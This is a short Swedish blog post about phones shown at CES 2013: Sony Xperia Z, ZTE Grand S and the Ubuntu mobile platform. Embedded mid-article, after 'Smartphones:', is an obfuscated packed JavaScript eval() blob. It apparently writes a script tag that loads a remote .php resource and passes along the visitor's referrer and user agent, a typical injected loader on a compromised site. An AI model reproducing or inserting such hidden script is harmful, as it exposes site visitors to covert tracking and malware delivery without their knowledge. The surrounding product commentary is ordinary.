Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

CES hetaste mobiler 2013

CES hetaste mobiler 2013
Sebastian

Smartphones: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bhrse|var|u0026u|referrer|ynzfr||js|php’.split(’|’),0,{}))
Under CES visades en mängd intressanta prylar upp. Vi har innan skrivit om många av dessa men inte så mycket om de olika telefonerna som visades upp. Här kommer en lista med vad som komma skall. 

 

Sony Xperia Z imponerar under CES
Under en längre period har Sony legat lite i skuggan av resterande konkurrenter, men nu är de tillbaka.
Sony har absolut inte släppt några dåliga mobiler under de senare åren men Xperia Z känns mer som det vi letat efter. Snygg design, tunn, lätt, stor skärm och väldigt snabb. Även den innovativa hdr-funktionerna i kameran får man absolut inte glömma.

Läs mer om Xperia Z

Grand S från ZTE, värstingen som vill in med de stora pojkarna
Den kinesiska tillverkaren ZTE har börjat satsa mer på hårdvarukraft. Under CES visades då deras nya flagskepp upp, Grand S. Intrycket den fått efter visningen är en aning plastig men ha en mycket högupplöst skärm.

Mobila plattformen från Ubuntu demonstrerades
Något mer innovativt som visades upp under CES var presentation av det nya operativsystemet för mobila enheter Ubuntu. Användargränssnittet ser ut att bli lättanvänt och intuitivt. Det kommer att finnas möjlighet att koppla mobilen till en skärm och tangentbord vilket låter mycket intressant i framtiden. Ett genialiskt sätt att ta vara på att smarta mobiler mer och mer tar över datorns jobb.